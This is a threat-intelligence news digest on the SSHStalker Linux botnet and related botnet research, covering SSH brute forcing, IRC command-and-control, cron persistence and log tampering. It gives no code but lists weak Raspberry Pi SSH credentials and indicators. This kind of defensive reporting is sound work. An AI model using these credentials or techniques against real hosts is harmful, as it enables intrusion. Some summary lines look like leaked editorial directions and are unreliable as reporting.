SSHStalker Linux Botnet Uses SSH Brute Force and Legacy Exploits for Dormant Persistence
Researchers reported a previously undocumented Linux botnet dubbed SSHStalker that has compromised roughly 7,000 systems by combining SSH credential brute-forcing/scanning with legacy (circa-2009) exploit chains and highly automated staging. The activity was observed over multiple weeks via SSH honeypots, with intrusions characterized by rapid deployment, on-host compilation, and automated enrollment into command infrastructure, indicating an operation optimized for mass compromise rather than targeted intrusion.
SSHStalker uses IRC-based command-and-control and a mixed toolkit that includes C-based bots, Perl scripts, and known botnet malware families such as Tsunami and Keiten. Reporting highlighted an unusual “dormant persistence” pattern: infected hosts are kept under control without immediate visible monetization or impact operations, despite having capabilities associated with DDoS and cryptomining. Persistence is described as noisy but effective, including cron-based relaunch behavior that can restore the malware within about a minute after disruption, suggesting the operator may be staging infrastructure or retaining access for future use.
Sources
Related Stories
New Botnet Research Highlights Linux SSH Compromise and SystemBC Proxy Malware at Scale
New threat research described two distinct botnet operations expanding through mass compromise. Flare reported a previously undocumented Linux botnet it dubbed **SSHStalker**, observed via an SSH honeypot and characterized by *IRC-based* command-and-control with multiple bot variants (including legacy families such as **Tsunami** and **Keiten**), automated scanning and staging (including a Golang scanner masquerading as `nmap` behavior and a compile-and-run workflow), and noisy but effective persistence via `cron` jobs that can re-establish the bot within roughly a minute if not fully removed. The tooling also included log-tampering artifacts (e.g., `utmp/wtmp/lastlog` manipulation) and a “back-catalog” of older Linux 2.6-era exploits, suggesting the operator is targeting long-tail, poorly maintained infrastructure; Flare noted playbook similarities to **Outlaw/Maxlas**-style operations but did not claim definitive attribution. Separately, reporting on a Silent Push analysis described a large **SystemBC** (aka **Coroxy/DroxiDat**) botnet comprising **10,000+** infected IPs globally, with notable concentrations in the US and additional presence across Europe and Asia. SystemBC is described as **SOCKS5 proxy malware** commonly used by threat actors to mask downstream activity and historically associated with enabling ransomware deployment; the report highlighted infections linked to **government-related domains** based on passive DNS observations, indicating potential exposure of sensitive environments even when immediate follow-on payloads were not directly observed. A third article provided general technical background on how internet-wide scanners (e.g., Shodan/Censys-style platforms) perform active service identification and banner grabbing; it is contextual but does not report on either botnet operation specifically.
1 months ago
Self-Propagating SSH Worm Building an IRC Botnet via Default Raspberry Pi Credentials
Internet Storm Center (ISC) researchers reported a **self-propagating SSH worm** observed by a DShield honeypot sensor that can compromise exposed Linux systems in roughly **four seconds** by using **credential stuffing/brute force** against weak SSH passwords, with a notable focus on *Raspberry Pi* devices left on default or common credentials (e.g., user `pi` with passwords such as `raspberry` and `raspberryraspberry993311`). The observed attack chain rapidly authenticates, uploads a compact **4.7 KB bash script** (via SCP), executes it, and establishes persistence while removing competing malware, enabling worm-like exponential spread across vulnerable internet-connected hosts. Technical analysis indicates the activity likely originated from an already-compromised *Raspberry Pi* in Germany (IP `83.135.10.12`, Versatel Deutschland), using an SSH client string consistent with Raspbian (`SSH-2.0-OpenSSH_8.4p1 Raspbian-5+b1`) and a recorded HASSH fingerprint `ae8bd7dd09970555aa4c6ed22adbbf56`. Post-compromise, the malware connects to **IRC-based command-and-control** and includes **cryptographically signed command verification**; it also automates scanning and lateral movement using tools such as **Zmap** and **sshpass**, reinforcing how default/weak SSH authentication on IoT and small-form-factor Linux systems remains a high-impact botnet entry point.
1 months ago
Research Highlights Malware and Post-Compromise Abuse Targeting Linux Network and Server Infrastructure
Security researchers reported several distinct but related findings showing how attackers are abusing **Linux-based infrastructure** for botnets, cryptomining, and post-compromise operations. Eclypsium identified a new **CondiBot** variant labeled `QTXBOT` and a previously undocumented **Monaco** cryptominer targeting network devices and exposed SSH services, with Monaco using brute-force access and exfiltrating stolen credentials to a command-and-control server hosted on Alibaba Cloud Singapore. Separately, Hunt.io exposed an Iranian-operated relay and botnet environment through an open directory, revealing a **15-node** tunnel network, SSH-based mass deployment tooling, on-host compilation of DDoS malware, and active command-and-control infrastructure. Flare also documented how threat actors repeatedly use the legitimate open-source script **Bench.sh** after initial access to profile compromised systems, including JupyterLab, Jupyter Notebook, SSH, Apache Tomcat, and PHP-based environments, in order to assess CPU, memory, disk, and bandwidth for follow-on abuse such as cryptomining, proxying, or DDoS. The reporting does **not** describe a single shared intrusion campaign: the CondiBot/Monaco discovery, the Iranian botnet infrastructure exposure, and Bench.sh abuse are separate research items connected by the broader theme of attackers operationalizing compromised Linux and network infrastructure. A separate report on **FancyBear/APT28** email theft and a general weekly security recap are different topics and should be excluded.
Today